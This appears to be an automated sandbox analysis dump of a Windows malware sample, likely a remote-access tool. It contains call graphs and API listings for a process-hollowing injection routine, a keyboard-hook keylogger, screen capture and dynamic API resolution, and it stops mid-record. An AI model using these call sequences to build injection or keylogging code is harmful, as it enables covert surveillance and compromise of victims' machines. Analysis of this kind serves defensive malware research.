417092 56064->56065 56066 401fd8 11 API calls 56065->56066 56067 41709e 56066->56067 56068 401fd8 11 API calls 56067->56068 56069 4170aa 56068->56069 56071 402093 28 API calls 56070->56071 56072 418957 56071->56072 56178 418e76 CreateDCA CreateCompatibleDC 56072->56178 56074 418971 56075 418980 56074->56075 56076 41899f 56074->56076 56077 4020f6 28 API calls 56075->56077 56078 4020df 11 API calls 56076->56078 56079 418991 56077->56079 56080 4189a7 56078->56080 56081 404aa1 61 API calls 56079->56081 56082 4189dd 56080->56082 56083 4189ac 56080->56083 56085 41899a 56081->56085 56287 418a92 35 API calls 56082->56287 56227 418c4c 56083->56227 56090 401fd8 11 API calls 56085->56090 56087 4189ec 56089 401fe2 28 API calls 56087->56089 56092 4189f6 56089->56092 56093 418a7f 56090->56093 56091 401fe2 28 API calls 56094 4189d3 56091->56094 56095 401fd8 11 API calls 56092->56095 56096 401fd8 11 API calls 56093->56096 56097 401fd8 11 API calls 56094->56097 56099 4189db 56095->56099 56098 41629b 56096->56098 56097->56099 56098->56062 56098->56063 56288 41bdf6 28 API calls 56099->56288 56101 418a27 56289 406362 28 API calls 56101->56289 56103 418a33 56104 402f10 28 API calls 56103->56104 56105 418a3e 56104->56105 56106 402f10 28 API calls 56105->56106 56107 418a48 56106->56107 56108 404aa1 61 API calls 56107->56108 56109 418a52 56108->56109 56110 401fd8 11 API calls 56109->56110 56111 418a5c 56110->56111 56112 401fd8 11 API calls 56111->56112 56113 418a64 56112->56113 56114 401fd8 11 API calls 56113->56114 56115 418a6f 56114->56115 56116 401fd8 11 API calls 56115->56116 56116->56085 56118 401fc0 28 API calls 56117->56118 56119 41878d 56118->56119 56120 401fc0 28 API calls 56119->56120 56121 4187a0 56120->56121 56122 4187c5 ___scrt_get_show_window_mode 56121->56122 56123 4187b6 GdiplusStartup 56121->56123 56328 4194c4 56122->56328 56123->56122 56126 401f13 28 API calls 56127 4187fa 56126->56127 56128 401f09 11 API calls 56127->56128 56129 418803 56128->56129 56130 418810 56129->56130 56131 404e26 99 API calls 56129->56131 56339 418e48 DeleteDC 56130->56339 56131->56130 56133 418815 56134 40482d 3 API calls 56133->56134 56135 41881c 56134->56135 56136 418820 56135->56136 56137 4048c8 97 API calls 56135->56137 56139 404e26 99 API calls 56136->56139 56138 41882c 56137->56138 56138->56136 56140 41883c 56138->56140 56141 418837 56139->56141 56340 404be5 CreateThread 56140->56340 56144 401fd8 11 API calls 56141->56144 56143 418846 56148 4188e1 56143->56148 56149 41885e 56143->56149 56145 418924 56144->56145 56146 401fd8 11 API calls 56145->56146 56147 418930 56146->56147 56147->56051 56150 402f31 28 API calls 56148->56150 56341 41bcbe 28 API calls 56149->56341 56152 4188f9 56150->56152 56154 402f10 28 API calls 56152->56154 56153 418865 56155 41bb8e 28 API calls 56153->56155 56157 418903 56154->56157 56156 418880 56155->56156 56158 402f31 28 API calls 56156->56158 56159 404aa1 61 API calls 56157->56159 56160 41888d 56158->56160 56177 4188df 56159->56177 56342 402ea1 28 API calls 56160->56342 56162 418899 56164 402f10 28 API calls 56162->56164 56163 401fd8 11 API calls 56163->56141 56165 4188a5 56164->56165 56343 402ea1 28 API calls 56165->56343 56167 4188af 56168 404aa1 61 API calls 56167->56168 56169 4188b9 56168->56169 56170 401fd8 11 API calls 56169->56170 56171 4188c4 56170->56171 56172 401fd8 11 API calls 56171->56172 56173 4188cd 56172->56173 56174 401fd8 11 API calls 56173->56174 56175 4188d6 56174->56175 56176 401fd8 11 API calls 56175->56176 56176->56177 56177->56163 56290 419325 56178->56290 56180 418eb1 56181 418ed8 56180->56181 56295 419367 GetMonitorInfoW 56180->56295 56183 418f36 56181->56183 56293 41939d GetMonitorInfoW 56181->56293 56184 402093 28 API calls 56183->56184 56226 418f42 56184->56226 56187 418f23 DeleteDC DeleteDC 56191 418f30 DeleteObject 56187->56191 56188 418f4f SelectObject 56189 418f5b DeleteDC DeleteDC 56188->56189 56190 418f6a StretchBlt 56188->56190 56189->56191 56190->56189 56193 418f93 56190->56193 56191->56183 56194 419014 56193->56194 56195 418f9a GetCursorInfo 56193->56195 56197 41905e GetObjectA 56194->56197 56199 419027 BitBlt 56194->56199 56200 41904e 56194->56200 56195->56194 56196 418fb1 GetIconInfo 56195->56196 56196->56194 56198 418fc7 DeleteObject DeleteObject DrawIcon 56196->56198 56197->56189 56201 419076 LocalAlloc 56197->56201 56198->56194 56199->56197 56200->56197 56203 419119 GlobalAlloc 56201->56203 56204 41910f 56201->56204 56203->56189 56205 41915b GetDIBits 56203->56205 56204->56203 56206 419172 DeleteDC DeleteDC DeleteObject GlobalFree 56205->56206 56207 419198 56205->56207 56206->56183 56208 4020df 11 API calls 56207->56208 56209 4191d4 56208->56209 56210 4020df 11 API calls 56209->56210 56211 4191e0 56210->56211 56212 40250a 28 API calls 56211->56212 56213 4191f0 56212->56213 56214 40250a 28 API calls 56213->56214 56215 41920d 56214->56215 56216 40250a 28 API calls 56215->56216 56217 41922f 56216->56217 56218 419240 DeleteObject GlobalFree DeleteDC 56217->56218 56219 419262 DeleteDC 56218->56219 56220 419265 56218->56220 56219->56220 56221 402055 11 API calls 56220->56221 56222 419274 56221->56222 56223 401fd8 11 API calls 56222->56223 56224 419280 56223->56224 56225 401fd8 11 API calls 56224->56225 56225->56226 56226->56074 56296 418b8f 56227->56296 56229 418c61 56230 418c73 56229->56230 56231 418c7e 56229->56231 56309 418e48 DeleteDC 56230->56309 56232 418c89 56231->56232 56233 418d6a 56231->56233 56236 418d10 56232->56236 56237 418ca6 56232->56237 56286 418cf7 56232->56286 56233->56286 56313 418e48 DeleteDC 56233->56313 56235 418c78 56243 418e76 59 API calls 56235->56243 56312 418e48 DeleteDC 56236->56312 56310 418e48 DeleteDC 56237->56310 56238 402055 11 API calls 56240 418e32 56238->56240 56244 401fd8 11 API calls 56240->56244 56247 418cbf 56243->56247 56248 4189ca 56244->56248 56245 418d15 56249 418e76 59 API calls 56245->56249 56246 418d89 56250 418e76 59 API calls 56246->56250 56251 401fe2 28 API calls 56247->56251 56248->56091 56252 418d29 56249->56252 56253 418d9d 56250->56253 56254 418cca 56251->56254 56255 401fe2 28 API calls 56252->56255 56256 401fe2 28 API calls 56253->56256 56257 401fd8 11 API calls 56254->56257 56258 418d34 56255->56258 56259 418da8 56256->56259 56260 418cd3 56257->56260 56261 401fd8 11 API calls 56258->56261 56262 401fd8 11 API calls 56259->56262 56311 418a92 35 API calls 56260->56311 56264 418d3d 56261->56264 56265 418db1 56262->56265 56267 418b8f 35 API calls 56264->56267 56268 418b8f 35 API calls 56265->56268 56266 418ce3 56269 401fe2 28 API calls 56266->56269 56270 418d48 56267->56270 56271 418dbc 56268->56271 56272 418cee 56269->56272 56275 401fe2 28 API calls 56270->56275 56273 401fe2 28 API calls 56271->56273 56274 401fd8 11 API calls 56272->56274 56277 418dc6 56273->56277 56274->56286 56276 418d52 56275->56276 56278 401fd8 11 API calls 56276->56278 56279 401fd8 11 API calls 56277->56279 56278->56286 56280 418dcf 56279->56280 56280->56286 56314 418a92 35 API calls 56280->56314 56282 418dec 56283 401fe2 28 API calls 56282->56283 56284 418df7 56283->56284 56285 401fd8 11 API calls 56284->56285 56285->56286 56286->56238 56287->56087 56288->56101 56289->56103 56291 436e90 ___scrt_get_show_window_mode 56290->56291 56292 419343 EnumDisplaySettingsW 56291->56292 56292->56180 56294 418f0d CreateCompatibleBitmap 56293->56294 56294->56187 56294->56188 56295->56181 56297 418ba1 56296->56297 56298 418ba9 SHCreateMemStream 56297->56298 56315 418656 GdipLoadImageFromStream 56298->56315 56300 418bbd 56316 41928e 56300->56316 56302 418bcb SHCreateMemStream 56323 4186cb GdipSaveImageToStream 56302->56323 56304 418be7 56305 40520c 28 API calls 56304->56305 56306 418c00 56305->56306 56325 418679 GdipDisposeImage 56306->56325 56308 418c42 56308->56229 56309->56235 56310->56235 56311->56266 56312->56245 56313->56246 56314->56282 56315->56300 56326 418714 GdipGetImageEncodersSize 56316->56326 56318 4192b0 56319 43bd51 new 21 API calls 56318->56319 56322 4192b6 56318->56322 56320 4192c5 56319->56320 56320->56322 56327 41871d GdipGetImageEncoders 56320->56327 56322->56302 56324 4186eb 56323->56324 56324->56304 56325->56308 56326->56318 56327->56322 56329 401f86 11 API calls 56328->56329 56330 4194db EnumDisplayMonitors 56329->56330 56331 4195b6 EnumDisplayDevicesW 56330->56331 56332 4187ed 56331->56332 56333 419507 EnumDisplayDevicesW 56331->56333 56332->56126 56334 41952f 56333->56334 56334->56331 56335 40417e 28 API calls 56334->56335 56336 403014 28 API calls 56334->56336 56337 401f09 11 API calls 56334->56337 56338 419583 EnumDisplayDevicesW 56334->56338 56335->56334 56336->56334 56337->56334 56338->56334 56339->56133 56340->56143 56344 404c01 56340->56344 56341->56153 56342->56162 56343->56167 56345 404c10 272 API calls 56344->56345 56346 404c0f 56345->56346 56347 434875 56352 434b47 SetUnhandledExceptionFilter 56347->56352 56349 43487a pre_c_initialization 56353 44554b 20 API calls 2 library calls 56349->56353 56351 434885 56352->56349 56353->56351 56354 44831e 56362 448710 56354->56362 56357 448332 56359 44833a 56360 448347 56359->56360 56370 44834a 11 API calls 56359->56370 56363 4484ca __dosmaperr 5 API calls 56362->56363 56364 448737 56363->56364 56365 448740 56364->56365 56366 44874f TlsAlloc 56364->56366 56367 434fcb __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 56365->56367 56366->56365 56368 448328 56367->56368 56368->56357 56369 448299 20 API calls 3 library calls 56368->56369 56369->56359 56370->56357 56371 100020db 56374 100020e7 ___DestructExceptionObject 56371->56374 56372 100020f6 56373 10002110 dllmain_raw 56373->56372 56375 1000212a 56373->56375 56374->56372 56374->56373 56378 1000210b 56374->56378 56384 10001eec 56375->56384 56377 10002177 56377->56372 56379 10001eec 29 API calls 56377->56379 56378->56372 56378->56377 56382 10001eec 29 API calls 56378->56382 56380 1000218a 56379->56380 56380->56372 56381 10002193 dllmain_raw 56380->56381 56381->56372 56383 1000216d dllmain_raw 56382->56383 56383->56377 56385 10001ef7 56384->56385 56386 10001f2a dllmain_crt_process_detach 56384->56386 56387 10001f1c dllmain_crt_process_attach 56385->56387 56388 10001efc 56385->56388 56393 10001f06 56386->56393 56387->56393 56389 10001f12 56388->56389 56391 10001f01 56388->56391 56395 100023ec 27 API calls 56389->56395 56391->56393 56394 1000240b 25 API calls 56391->56394 56393->56378 56394->56393 56395->56393 56396 43be58 56399 43be64 _swprintf CallCatchBlock 56396->56399 56397 43be72 56412 4405dd 20 API calls __dosmaperr 56397->56412 56399->56397 56400 43be9c 56399->56400 56407 445888 EnterCriticalSection 56400->56407 56402 43be77 pre_c_initialization CallCatchBlock 56403 43bea7 56408 43bf48 56403->56408 56407->56403 56410 43bf56 56408->56410 56409 43beb2 56413 43becf LeaveCriticalSection std::_Lockit::~_Lockit 56409->56413 56410->56409 56414 44976c 37 API calls 2 library calls 56410->56414 56412->56402 56413->56402 56414->56410 56415 41dfbd 56416 41dfd2 ctype ___scrt_get_show_window_mode 56415->56416 56417 41e1d5 56416->56417 56419 432ec4 21 API calls 56416->56419 56423 41e189 56417->56423 56429 41db62 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 56417->56429 56422 41e182 ___scrt_get_show_window_mode 56419->56422 56420 41e1e6 56421 432ec4 21 API calls 56420->56421 56420->56423 56425 41e21f ___scrt_get_show_window_mode 56421->56425 56422->56423 56424 432ec4 21 API calls 56422->56424 56427 41e1af ___scrt_get_show_window_mode 56424->56427 56425->56423 56430 43354a 56425->56430 56427->56423 56428 432ec4 21 API calls 56427->56428 56428->56417 56429->56420 56433 433469 56430->56433 56432 433552 56432->56423 56434 433482 56433->56434 56438 433478 56433->56438 56435 432ec4 21 API calls 56434->56435 56434->56438 56436 4334a3 56435->56436 56436->56438 56439 433837 CryptAcquireContextA 56436->56439 56438->56432 56440 433853 56439->56440 56441 433858 CryptGenRandom 56439->56441 56440->56438 56441->56440 56442 43386d CryptReleaseContext 56441->56442 56442->56440 56443 40165e 56444 401666 56443->56444 56445 401669 56443->56445 56446 4016a8 56445->56446 56448 401696 56445->56448 56447 4344ea new 22 API calls 56446->56447 56450 40169c 56447->56450 56449 4344ea new 22 API calls 56448->56449 56449->56450 56451 426bdc 56457 426cb1 recv 56451->56457 56458 10001f3f 56459 10001f4b ___DestructExceptionObject 56458->56459 56476 1000247c 56459->56476 56461 10001f52 56462 10002041 56461->56462 56463 10001f7c 56461->56463 56475 10001f57 ___scrt_is_nonwritable_in_current_image 56461->56475 56492 10002639 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 56462->56492 56487 100023de IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 56463->56487 56466 10002048 56467 10001f8b __RTC_Initialize 56467->56475 56488 100022fc RtlInitializeSListHead 56467->56488 56469 10001f99 ___scrt_initialize_default_local_stdio_options 56489 100046c5 5 API calls _ValidateLocalCookies 56469->56489 56471 10001fad 56471->56475 56490 100023b3 IsProcessorFeaturePresent ___isa_available_init ___scrt_release_startup_lock 56471->56490 56473 10001fb8 56473->56475 56491 10004669 5 API calls _ValidateLocalCookies 56473->56491 56477 10002485 56476->56477 56493 10002933 IsProcessorFeaturePresent 56477->56493 56479 10002491 56494 100034ea 56479->56494 56481 10002496 56486 1000249a 56481->56486 56503 100053c8 56481->56503 56484 100024b1 56484->56461 56486->56461 56487->56467 56488->56469 56489->56471 56490->56473 56491->56475 56492->56466 56493->56479 56495 100034ef ___vcrt_initialize_winapi_thunks 56494->56495 56507 10003936 6 API calls 2 library calls 56495->56507 56497 100034f9 56498 100034fd 56497->56498 56508 100038e8 56497->56508 56498->56481 56500 10003505 56501 10003510 56500->56501 56516 10003972 RtlDeleteCriticalSection 56500->56516 56501->56481 56535 10007457 56503->56535 56506 10003529 7 API calls 3 library calls 56506->56486 56507->56497 56517 10003af1 56508->56517 56512 1000390b 56513 10003918 56512->56513 56523 1000391b 5 API calls ___vcrt_FlsFree 56512->56523 56513->56500 56515 100038fd 56515->56500 56516->56498 56524 10003a82 56517->56524 56519 10003b0b 56520 10003b24 TlsAlloc 56519->56520 56521 100038f2 56519->56521 56521->56515 56522 10003ba2 5 API calls try_get_function 56521->56522 56522->56512 56523->56515 56525 10003aaa 56524->56525 56527 10003aa6 __crt_fast_encode_pointer 56524->56527 56525->56527 56528 100039be 56525->56528 56527->56519 56530 100039cd try_get_first_available_module 56528->56530 56529 10003a77 56529->56527 56530->56529 56531 100039ea LoadLibraryExW 56530->56531 56533 10003a60 FreeLibrary 56530->56533 56534 10003a38 LoadLibraryExW 56530->56534 56531->56530 56532 10003a05 GetLastError 56531->56532 56532->56530 56533->56530 56534->56530 56536 10007470 56535->56536 56537 10002ada _ValidateLocalCookies 5 API calls 56536->56537 56538 100024a3 56537->56538 56538->56484 56538->56506 56539 10005bff 56547 10005d5c 56539->56547 56542 10005c13 56544 10005c1b 56545 10005c28 56544->56545 56555 10005c2b 10 API calls 56544->56555 56548 10005c45 __dosmaperr 4 API calls 56547->56548 56549 10005d83 56548->56549 56550 10005d9b TlsAlloc 56549->56550 56551 10005d8c 56549->56551 56550->56551 56552 10002ada _ValidateLocalCookies 5 API calls 56551->56552 56553 10005c09 56552->56553 56553->56542 56554 10005b7a 19 API calls 2 library calls 56553->56554 56554->56544 56555->56542

                                                          Control-flow Graph

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(Psapi), ref: 0041CB65
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB6E
                                                          • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB88
                                                          • LoadLibraryA.KERNEL32(shcore), ref: 0041CB9A
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CB9D
                                                          • LoadLibraryA.KERNEL32(user32), ref: 0041CBAE
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBB1
                                                          • LoadLibraryA.KERNEL32(ntdll), ref: 0041CBC3
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBC6
                                                          • LoadLibraryA.KERNEL32(kernel32), ref: 0041CBD2
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBD5
                                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBE9
                                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CBFD
                                                          • LoadLibraryA.KERNEL32(Shell32), ref: 0041CC0E
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC11
                                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC25
                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC39
                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC4D
                                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC61
                                                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC75
                                                          • LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CC83
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC86
                                                          • LoadLibraryA.KERNEL32(kernel32), ref: 0041CC97
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CC9A
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCAA
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCBA
                                                          • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCCC
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCCF
                                                          • LoadLibraryA.KERNEL32(Iphlpapi), ref: 0041CCDC
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCDF
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CCF3
                                                          • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD07
                                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD19
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD1C
                                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD29
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD2C
                                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD39
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD3C
                                                          • LoadLibraryA.KERNEL32(Rstrtmgr), ref: 0041CD49
                                                          • GetProcAddress.KERNEL32(00000000,?,?,?,?,0040E9E1), ref: 0041CD4C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$LibraryLoad$HandleModule
                                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                          • API String ID: 4236061018-3687161714
                                                          • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                          • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                                          • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                                          • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 448 4180ef-418118 449 41811c-418183 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 418480 449->450 451 418189-418190 449->451 453 418482-41848c 450->453 451->450 452 418196-41819d 451->452 452->450 454 4181a3-4181a5 452->454 454->450 455 4181ab-4181d8 call 436e90 * 2 454->455 455->450 460 4181de-4181e9 455->460 460->450 461 4181ef-41821f CreateProcessW 460->461 462 418225-41824d VirtualAlloc GetThreadContext 461->462 463 41847a GetLastError 461->463 464 418253-418273 ReadProcessMemory 462->464 465 418444-418478 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->465 463->450 464->465 466 418279-41829b NtCreateSection 464->466 465->450 466->465 467 4182a1-4182ae 466->467 468 4182c1-4182e3 NtMapViewOfSection 467->468 469 4182b0-4182bb NtUnmapViewOfSection 467->469 470 4182e5-418322 VirtualFree NtClose TerminateProcess 468->470 471 41832d-418354 GetCurrentProcess NtMapViewOfSection 468->471 469->468 470->449 472 418328 470->472 471->465 473 41835a-41835e 471->473 472->450 474 418360-418364 473->474 475 418367-418385 call 436910 473->475 474->475 478 4183c7-4183d0 475->478 479 418387-418395 475->479 480 4183f0-4183f4 478->480 481 4183d2-4183d8 478->481 482 418397-4183ba call 436910 479->482 484 4183f6-418413 WriteProcessMemory 480->484 485 418419-418430 SetThreadContext 480->485 481->480 483 4183da-4183ed call 418503 481->483 491 4183bc-4183c3 482->491 483->480 484->465 488 418415 484->488 485->465 489 418432-41843e ResumeThread 485->489 488->485 489->465 493 418440-418442 489->493 491->478 493->453
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418136
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00418139
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 0041814A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041814D
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 0041815E
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00418161
                                                          • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 00418172
                                                          • GetProcAddress.KERNEL32(00000000), ref: 00418175
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418217
                                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041822F
                                                          • GetThreadContext.KERNEL32(?,00000000), ref: 00418245
                                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 0041826B
                                                          • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 00418293
                                                          • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182BB
                                                          • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 004182DB
                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004182ED
                                                          • NtClose.NTDLL(?), ref: 004182F7
                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 00418301
                                                          • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418341
                                                          • NtMapViewOfSection.NTDLL(?,00000000), ref: 0041834C
                                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 0041840B
                                                          • SetThreadContext.KERNEL32(?,00000000), ref: 00418428
                                                          • ResumeThread.KERNEL32(?), ref: 00418435
                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041844C
                                                          • GetCurrentProcess.KERNEL32(?), ref: 00418457
                                                          • NtUnmapViewOfSection.NTDLL(00000000), ref: 0041845E
                                                          • NtClose.NTDLL(?), ref: 00418468
                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 00418472
                                                          • GetLastError.KERNEL32 ref: 0041847A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
                                                          • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                          • API String ID: 316982871-3035715614
                                                          • Opcode ID: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                          • Instruction ID: 216cb1b436b1bb1c0a39989cd20dfb1fea14fcd849b5832ba41dfff5d3f22c39
                                                          • Opcode Fuzzy Hash: 89e9824b65005418a7066967bf7851544621f3057e11158cf19ce55185e759a5
                                                          • Instruction Fuzzy Hash: EDA16E70604305AFDB208F64CC85BAB7BE8FF48705F04482EF595D6291EB78D844CB1A

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1737 40a2b8-40a2cf 1738 40a2d1-40a2eb GetModuleHandleA SetWindowsHookExA 1737->1738 1739 40a333-40a343 GetMessageA 1737->1739 1738->1739 1742 40a2ed-40a331 GetLastError call 41bb8e call 4052fd call 402093 call 41b4ef call 401fd8 1738->1742 1740 40a345-40a35d TranslateMessage DispatchMessageA 1739->1740 1741 40a35f 1739->1741 1740->1739 1740->1741 1743 40a361-40a366 1741->1743 1742->1743
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                                          • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                                          • GetLastError.KERNEL32 ref: 0040A2ED
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          • GetMessageA.USER32 ref: 0040A33B
                                                          • TranslateMessage.USER32(?), ref: 0040A34A
                                                          • DispatchMessageA.USER32 ref: 0040A355
                                                          Strings
                                                          • Keylogger initialization failure: error , xrefs: 0040A301
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                          • String ID: Keylogger initialization failure: error
                                                          • API String ID: 3219506041-952744263
                                                          • Opcode ID: 718f47324b8862b268baf47dc1492ba3640dfc9c03fb41c98a70d8505363c975
                                                          • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
